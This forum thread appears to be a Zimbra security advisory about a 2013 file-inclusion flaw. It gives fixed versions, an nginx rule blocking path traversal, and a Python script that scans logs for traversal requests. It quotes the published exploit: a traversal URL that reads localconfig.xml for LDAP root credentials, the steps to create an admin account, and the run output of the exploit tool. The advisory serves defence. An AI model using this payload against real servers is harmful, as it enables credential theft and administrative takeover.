Thread: Security Guidance for reported "0day Exploit"

  1. #1

    Security Guidance for reported "0day Exploit"

    Overview:
    A reportedly "0day Exploit" was posted on Twitter on Friday, December 06, 2013. However, please note - Zimbra has previously released a fix for this Security bug.

    Release Info:
    This vulnerability was identified in Feb 2013, and a fix released by Zimbra in Feb 2013. The bug number was the following (note: it is locked, so the full details are not currently public):

    Vulnerability about skin/branding feature, sensitive information can be retrieved
    Access Denied
    Fixed: 7.2.2 Patch 2, 7.2.3, 8.0.2 Patch 1, 8.0.3

    A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
    Also, a notification was included in these Release Notes:


    8.0.2 Patch 1: http://files2.zimbra.com/website/doc...h_8_0_2_r1.pdf - February 19, 2013: Patch 8.0.2 P1 patch fixes the following bug: Bug 80338 Security Fix
    7.2.2 Patch 2: http://files2.zimbra.com/website/doc...h_7_2_2_r1.pdf - February 19, 2013: Patch 7.2.2 P2 patch fixes the following bug: Bug 80338 Security Fix

    ZCS7 Customers:
    ZCS7 Customers should upgrade to 7.2.2 Patch 2 or later (7.2.5 is the latest, and 7.2.6 will be released in the near future). Customers running these versions should not be vulnerable.

    ZCS8 Customers:
    ZCS8 Customers should upgrade to 8.0.2 Patch 1 or later (8.0.5 is the latest, and 8.0.6 will be released in the near future). Customers running these versions should not be vulnerable.

    Workaround:
    If using Nginx or other proxy, you could use a configuration like the following to some effect:

    You need to add the below 3 lines to
    "nginx.conf.web.[http|https].default.template":

    if ($request_uri ~ "\.\.") {
        return 404;
    }
    if ($request_uri ~ "\%2[eE]\%2[eE]") {
        return 404;
    }

    Then run:

    $ zmproxyconfgen
    $ zmproxyctl restart
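    Added example (not from this post or from Zimbra): a small Python check that applies the same two rules as the workaround to nginx access-log lines, so you can see which past requests the rules would reject and which were still served (HTTP 200) before the workaround or patch was in place. The log lines, client addresses and skin values are constructed for the demonstration.

```python
import re

# The two rules from the nginx workaround, as Python regexes.
WORKAROUND_PATTERNS = [re.compile(r"\.\."), re.compile(r"%2[eE]%2[eE]")]

# Minimal parser for nginx combined-format lines: client, request URI, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def would_be_blocked(uri):
    """True if either workaround rule matches, i.e. nginx would return 404."""
    return any(p.search(uri) for p in WORKAROUND_PATTERNS)


def scan_access_log(lines):
    """Return (client, uri, status) for every request the workaround targets."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and would_be_blocked(m.group("uri")):
            hits.append((m.group("client"), m.group("uri"), int(m.group("status"))))
    return hits


def served_traversals(hits):
    """Hits answered with 200: requests that got through before the workaround
    or patch was applied and therefore need follow-up investigation."""
    return [h for h in hits if h[2] == 200]


# Constructed sample lines (not real traffic); the skin values mirror the
# plain and percent-encoded traversal forms the workaround rules cover.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Dec/2013:10:00:01 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=1&skin=harmony HTTP/1.1" 200 512 "-" "Mozilla"',
    '10.0.0.6 - - [06/Dec/2013:10:00:02 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=1&skin=../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 2048 "-" "curl"',
    '10.0.0.7 - - [06/Dec/2013:10:00:03 +0000] "GET /res/I18nMsg,AjxMsg.js.zgz?v=1&skin=%2E%2E/%2E%2E/conf HTTP/1.1" 404 0 "-" "curl"',
    '10.0.0.8 - - [06/Dec/2013:10:00:04 +0000] "GET /zimbra/ HTTP/1.1" 200 120 "-" "Mozilla"',
]

if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for client, uri, status in hits:
        print(f"{client} {status} {uri}")
    print("served before mitigation:", len(served_traversals(hits)))
```

    Run it against the real access log (/opt/zimbra/log/nginx.access.log, path assumed) to find requests that were answered with 200 and warrant the investigation steps linked in the reply below.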

    Published Exploit:

    Originally posted to Twitter: https://twitter.com/DigitalCTF

    Zimbra - 0day exploit / Privilege escalation via LFI

    # Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
    # Date: 06 Dec 2013
    # Exploit Author: rubina119
    # Contact Email : rubina119[at]gmail.com
    # Vendor Homepage: Zimbra offers Open Source email server software and shared calendar for Linux and the Mac.
    # Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected.
    # Tested on: Centos(x), Ubuntu.
    # CVE : No CVE, no patch just 0Day
    # State : Critical

    # Mirror: http://www.exploit-db.com/sploits/zi..._rubina119.zip

    ---------------Description-----------------

    This script exploits a Local File Inclusion in
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz
    which allows us to see localconfig.xml, which contains LDAP root credentials.
    These allow us to make requests to the /service/admin/soap API with the stolen
    LDAP credentials, create a user with administration privileges, and gain
    access to the Administration Console.

    LFI is located at :
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    Example :

    https://mail.example.com/res/I18nMsg...Keys,ZmKeys,Zd...

    or

    https://mail.example.com:7071/zimbra...Msg,ZMsg,ZmMsg,...

    ----------------Exploit-----------------
    Before using this exploit, the target server must have the admin console port
    "7071" open, otherwise it won't work.

    Use the exploit like this:
    ruby run.rb -t mail.example.com -u someuser -p Test123_23
    [*] Looking if host is vuln....
    [+] Host is vuln exploiting...
    [+] Obtaining Domain Name
    [+] Creating Account
    [+] Elevating Privileges
    [+] Login Credentials
    [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
    [*] Account : someuser@example.com
    [*] Password : Test123_23
    [+] Successfully Exploited !

    The number of vulnerable servers is huge, like 80/100.
    This is only for educational purposes.

  2. #2

    Note: there is some additional information here on Investigating and Securing Systems at risk of this exploit:
    https://wiki.zimbra.com/wiki/Investi...curing_Systems
